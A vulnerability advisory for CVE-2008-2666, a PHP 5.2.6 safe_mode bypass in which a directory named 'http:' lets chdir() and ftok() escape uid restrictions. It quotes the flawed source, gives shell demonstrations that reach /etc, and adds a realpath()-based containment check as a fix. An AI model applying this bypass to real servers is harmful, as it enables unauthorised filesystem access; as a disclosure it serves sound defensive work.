PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

2008.06.17
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass]

Author: Maksymilian Arciemowicz
Date:
- Written: 10.05.2008
- Public: 17.06.2008
CVE: CVE-2008-2666
CWE: CWE-264
Risk: Medium
Affected Software: PHP 5.2.6
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

chdir - Change directory
SYNOPSIS: bool chdir ( string $directory )
http://pl.php.net/manual/en/function.chdir.php

ftok - Convert a pathname and a project identifier to a System V IPC key
SYNOPSIS: int ftok ( string $pathname , string $proj )
http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
WE WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---

Let's look at the chdir() function:

---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	/* safe_mode uid check and open_basedir check on the raw, unresolved string */
	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}
	ret = VCWD_CHDIR(str);

	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---

str is checked by safe_mode, for example:

---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

In the current directory, create a subdirectory named "http:". It is then possible to call chdir("http://../../../../../../") and end up in /.

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))

For str="http://../../../../../../" safe_mode will ignore all paths with http://. The same situation exists with the ftok() function (and more).

---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
WE WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to fix ---

Do not use safe_mode as your main safety mechanism.

--- 3. Contact ---

Author: Maksymilian Arciemowicz
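The fix section above says not to rely on safe_mode; what follows is an added example (not the advisory's or PHP's own code) of the check a script can perform instead: canonicalise the requested directory with realpath() before deciding, so a subdirectory literally named "http:" used as a disguised relative path resolves to the real target and is refused. It builds a scratch copy of the advisory's EXAMPLE2 layout under the system temp directory; the function name chdir_within() and the directory names are this example's own assumptions.

```php
<?php
// Added example (not the advisory's or PHP's own code): containment check that does
// not depend on safe_mode. The requested directory is canonicalised with realpath()
// BEFORE any decision is taken, which is exactly what the bypassed guard did not do:
// "http://../../etc/" relative to /www is /www/http:/../../etc, i.e. /etc.
function chdir_within(string $dir, string $base): bool
{
    $realBase = realpath($base);
    $realDir  = realpath($dir);              // resolves "..", symlinks; false if missing
    if ($realBase === false || $realDir === false) {
        return false;
    }
    $realBase = rtrim($realBase, '/');
    // Allowed only if the target is the base itself or lies strictly beneath it.
    $inside = ($realDir === $realBase)
        || strncmp($realDir, $realBase . '/', strlen($realBase) + 1) === 0;
    if (!$inside) {
        error_log("chdir_within: refused '$dir' (resolves to '$realDir', outside '$realBase')");
        return false;
    }
    return chdir($realDir);
}

// Constructed layout mirroring the advisory's EXAMPLE2: $root/www/http: and $root/etc.
$root = sys_get_temp_dir() . '/safe_mode_demo_' . getmypid();
mkdir("$root/www/http:", 0700, true);
mkdir("$root/etc", 0700);
chdir("$root/www");

// Disguised traversal: resolves to $root/etc, outside the base, so it is refused.
var_dump(chdir_within('http://../../etc/', "$root/www"));
// Ordinary subdirectory of the base: accepted.
var_dump(chdir_within('http:', "$root/www"));
echo getcwd(), "\n";                         // the process never left $root/www
```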

Copyright 2017, cxsecurity.com
